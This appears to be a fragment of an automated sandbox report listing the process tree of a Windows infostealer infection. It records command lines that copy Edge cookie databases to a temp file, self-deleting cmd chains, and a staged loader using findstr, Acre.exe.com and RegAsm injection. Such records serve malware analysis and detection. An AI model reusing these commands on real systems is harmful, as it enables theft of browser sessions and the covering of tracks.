                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                                                                                                                      PID:11004
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                                          PID:9512
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                              PID:4164
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\RA5z9D8fl4Irup9xAMNHTebC.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\RA5z9D8fl4Irup9xAMNHTebC.exe"
                                                                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                            PID:6368
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\Ifj1vSAkTcMWjyqQ5MGnXFPS.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\Ifj1vSAkTcMWjyqQ5MGnXFPS.exe"
                                                                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                                                                              PID:3476
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4335924.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4335924.exe"
                                                                                                                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4220
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6734823.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6734823.exe"
                                                                                                                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                                                                                                                    PID:10076
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\VgohHpl9badRv3ineLIzLx9N.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\VgohHpl9badRv3ineLIzLx9N.exe"
                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5164
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe"
                                                                                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6100
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe"
                                                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:6036
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\cWfFC4E4HL7NXP1ZiF4e2Zkl.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\cWfFC4E4HL7NXP1ZiF4e2Zkl.exe"
                                                                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                      PID:10016
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im cWfFC4E4HL7NXP1ZiF4e2Zkl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\cWfFC4E4HL7NXP1ZiF4e2Zkl.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7996
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                            taskkill /im cWfFC4E4HL7NXP1ZiF4e2Zkl.exe /f
                                                                                                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                            PID:10072
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                            PID:9640
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe"
                                                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                                                          PID:10152
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe" -a
                                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2268
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe"
                                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                                    PID:8712
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe" -a
                                                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                                                        PID:8692
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe"
                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7004
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe"
                                                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                          PID:9024
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\L5flnjcJuudBmw_cvU8QgaDT.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\L5flnjcJuudBmw_cvU8QgaDT.exe"
                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6492
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                                                              PID:7072
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6256
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:10036
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                      PID:9548
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5780
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                        PID:9404
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\cZ0MZnndwT_5BtnSarWrozwc.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\cZ0MZnndwT_5BtnSarWrozwc.exe"
                                                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                  PID:7080
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                    PID:10064
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                      "{path}"
                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4476
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:11236
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe"
                                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                      PID:8428
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe
                                                                                                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5716
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\tCjtKMq_ssR4Qgjq1V0OjHhj.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\tCjtKMq_ssR4Qgjq1V0OjHhj.exe"
                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8800
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3443978.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3443978.exe"
                                                                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6024
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:10708
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:8292
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5600
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:7440
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\BMNiBPiHx2AxtHmC_l9AQP6t.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\BMNiBPiHx2AxtHmC_l9AQP6t.exe"
                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6148
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe"
                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                PID:6084
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe"
                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                  PID:5904
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe"
                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                PID:620
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe
                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7104
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\oVKKbmntquO8nFyg6iKBeJuw.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\oVKKbmntquO8nFyg6iKBeJuw.exe"
                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                  PID:6132
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe"
                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                  PID:6020
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7024
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\xKdTfqts19OSJeYygrVD7PCJ.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\xKdTfqts19OSJeYygrVD7PCJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2132
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im xKdTfqts19OSJeYygrVD7PCJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xKdTfqts19OSJeYygrVD7PCJ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8144
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                              taskkill /im xKdTfqts19OSJeYygrVD7PCJ.exe /f
                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                              PID:7124
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                              PID:9088
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\c2q20zP3GdpD5iJo5GTMJMis.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\c2q20zP3GdpD5iJo5GTMJMis.exe"
                                                                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7291473.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7291473.exe"
                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7548
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\yPJJpsibSpAvmvQLd58bVbon.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\yPJJpsibSpAvmvQLd58bVbon.exe"
                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                            PID:3792
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:6752
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  cmd
                                                                                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2684
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                                                                      findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:6808
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                        Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3840
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5912
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\U1hG6VPC773nzQRJrOX4TwzB.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\U1hG6VPC773nzQRJrOX4TwzB.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5116
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6640
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5132
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4720
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
                                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8088
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im SMlFsKgkWRAsC6vCCHJ8UddG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                taskkill /im SMlFsKgkWRAsC6vCCHJ8UddG.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                PID:7036
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2400
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
                                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:8076
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4120
